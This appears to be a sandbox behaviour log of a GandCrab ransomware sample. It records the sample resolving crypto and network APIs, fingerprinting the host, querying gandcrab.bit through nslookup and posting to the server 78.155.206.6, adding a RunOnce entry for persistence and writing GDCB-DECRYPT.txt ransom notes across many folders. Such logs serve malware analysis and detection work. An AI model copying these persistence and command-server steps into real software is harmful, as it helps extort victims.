Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74527020 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x769b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76a5a630 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x75d5f8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x75d5f0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x75d5f0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x75d5f550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x75d5efa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x75d60730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x75d75c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x75d60ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x75d5f890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x75d75bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x75d63fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x75d5fc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x75d60ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x75d5ed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x75d5ed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x75d604a0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x74760000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x748eedb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x748f4370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x748f4cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76ec0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x76f08040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x76ee2290 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x73b20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x73b94510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x73be9fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x73ba2410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x73b92460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x73bbb650 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x73b911e0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x732d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x732ec544 True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77190000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x771b6b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77190000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x771b6b10 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77190000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x771b6b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup gandcrab.bit a.dnspod.com, os_pid = 0xdf0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 147 True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, size = 512 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, filename = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, desired_access = FILE_MAP_COPY True 1
Fn
Module Unmap process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.155.206.6, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1019, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.155.206.6/curl.php?token=1019 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 5709 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 129390 True 1
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x9d4
(Host: 4, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, base_address = 0x400000 True 3
Fn
Window Create window_name = firefox, class_name = win32app, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = firefox, class_name = win32app, index = 18446744073709551600, new_long = 0 True 1
Fn
Thread 0xd38
(Host: 16, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, filename = C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe, process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe, desired_access = FILE_MAP_READ True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 131584 True 1
Fn
Data
Module Unmap process_name = c:\users\ciihmnxmn6ps\desktop\bi35.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x75d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x75d60df0 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = uxdfnpsuzlo, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0xcf0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xce4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd88
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x9c4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xdb8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd80
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd7c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbec
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd60
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd5c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd34
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd3c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x568
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xcec
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xcd8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xdc0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x250
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x278
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x9d8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd00
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xcf4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd40
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xcfc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xcf8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd44
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xd4c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x818
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xf0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x210
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x46c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xdac
(Host: 1378, Network: 0)
+
Category Operation Information Success Count Logfile
File Create filename = C:\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-18\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-18\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\es-MX\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\es-MX\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\fr-CA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\fr-CA\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
